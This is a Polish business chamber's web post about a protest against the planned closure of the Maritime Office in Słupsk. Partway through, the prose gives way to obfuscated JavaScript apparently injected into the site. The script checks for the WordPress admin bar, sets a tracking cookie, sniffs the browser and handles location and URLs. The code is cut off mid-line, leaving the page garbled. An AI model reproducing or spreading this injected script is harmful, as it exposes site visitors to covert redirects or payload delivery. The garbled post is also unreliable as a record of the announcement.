Protest w sprawie likwidacji Urzędu Morskiego w Słupsku | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!

Grupa inicjatywna ds. regionu Pomorza Środkowego, złożyła do Pana Premiera Mateusza Morawieckiego protest w sprawie planowanego projektu rozporządzenia Ministra Gospodarki Morskiej dotyczącego zniesienia Urzędu Morskiego w Słupsku.

Zgodnie uważamy, że pozbawienie Słupska, a tym samym całego regionu, tak ważnej instytucji rządowej jest działaniem na jego szkodę. Ma to znaczący wpływ na działanie firm i osób związanych z gospodarką morską. Pismo zostało złożone w imieniu instytucji otoczenia biznesu Naszego Regionu m.in. Północnej Izby Gospodarczej w Koszalinie, Koszalińskiej Izby Przemysłowo Handlowej, Loży Koszalińskiej BCC, Zrzeszenia Kupców i Przedsiębiorców.

Pod linkiem przesyłam treść pisma w tej sprawie. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m